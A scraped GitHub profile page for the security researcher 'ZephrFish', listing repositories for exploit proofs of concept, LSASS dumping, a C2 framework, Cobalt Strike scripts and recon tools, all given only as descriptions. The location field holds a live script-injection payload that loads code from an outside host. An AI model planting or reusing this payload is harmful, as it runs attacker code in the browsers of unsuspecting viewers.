ZephrFish
Hacker, Builder, Leader, Thinker, FAFO Engineer
"><script src="https://xss.r1.pe"></script>Scotland
Pinned Repositories
AttackDeploy
Scripts for Deploying new server
Bloodhound-CustomQueries
Custom Queries - Brought Up to BH4.1 syntax
BugBountyTemplates
A collection of templates for bug bounty reporting
BurpFeed
Hacked together script for feeding urls into Burp's Sitemap
CVE-2020-1350_HoneyPoC
HoneyPoC: Proof-of-Concept (PoC) script to exploit SIGRed (CVE-2020-1350). Achieves Domain Admin on Domain Controllers running Windows Server 2000 up to Windows Server 2019.
DockerAttack
Various Tools and Docker Images
GoogD0rker
Note: Going through a full re-write of the tooling so the current versions in the repo do not work!
RandomScripts
Random Shell Scripts and other ideas I have along the way
static-tools
Static compiled binaries + scripts ready to use on systems
Wordlists
Various Payload wordlists
ZephrFish's Repositories
ZephrFish/static-tools
Static compiled binaries + scripts ready to use on systems
ZephrFish/Exch-CVE-2021-26855
CVE-2021-26855: PoC (Not a HoneyPoC for once!)
ZephrFish/CVE-2020-16898
HoneyPoC 2.0: Proof-of-Concept (PoC) script to exploit IPv6 (CVE-2020-16898).
ZephrFish/PurpleTeamWorkshop-LabManual
Purple Team Workshop by @jorgeorchilles
ZephrFish/LegacyResearch
ZephrFish/CVE-2021-22986_Check
CVE-2021-22986 Checker Script in Python3
ZephrFish/iRecon
Of the thousands of lazy reconnaissance scripts, this one is by far the one in this repository.
ZephrFish/openvpn-install-1
Set up your own OpenVPN server on Debian, Ubuntu, Fedora, CentOS or Arch Linux.
ZephrFish/rengine
reNgine is an automated reconnaissance framework meant for gathering information during penetration testing of web applications. reNgine has customizable scan engines, which can be used to scan the websites, endpoints, and gather information.
ZephrFish/Bloodhound-Custom-Queries
Custom Query list for the Bloodhound GUI based off my cheatsheet
ZephrFish/redsocial
ZephrFish/SharpC2
.NET C2 Framework Proof of Concept
ZephrFish/spiderfoot
SpiderFoot automates OSINT collection so that you can focus on analysis.
ZephrFish/SSH_Notify
Different Scripts for SSH hardening blog
ZephrFish/AggressorScripts
Aggressor scripts for use with Cobalt Strike 3.0+
ZephrFish/CobaltStrikeToGhostWriter
Log converter from CS log to Ghostwriter CSV
ZephrFish/CTI-Lexicon
ZephrFish/JSA
Javascript security analysis (JSA) is a program for javascript analysis during web application security assessment.
ZephrFish/MirrorDump
Another LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory
ZephrFish/NTLMRecon
Enumerate information from NTLM authentication enabled web endpoints 🔎
ZephrFish/Open-source-tools-for-CTI
Professional Repository of my tools
ZephrFish/pentest-tools
Custom pentesting tools
ZephrFish/RTOVMSetup
ZephrFish/SharpEDRChecker
Checks running processes, process metadata, Dlls loaded into your current process and the each DLLs metadata, common install directories, installed services and each service binaries metadata, installed drivers and each drivers metadata, all for the presence of known defensive products such as AV's, EDR's and logging tools.
ZephrFish/sysmon-config
Sysmon configuration file template with default high-quality event tracing
ZephrFish/velocipher
Digging Deeper....
ZephrFish/webhook
A simple webhook server
ZephrFish/byt3bl33d3r
Github Profile Readme
ZephrFish/hax
ZephrFish/openvpn-install
OpenVPN road warrior installer for Ubuntu, Debian, CentOS and Fedora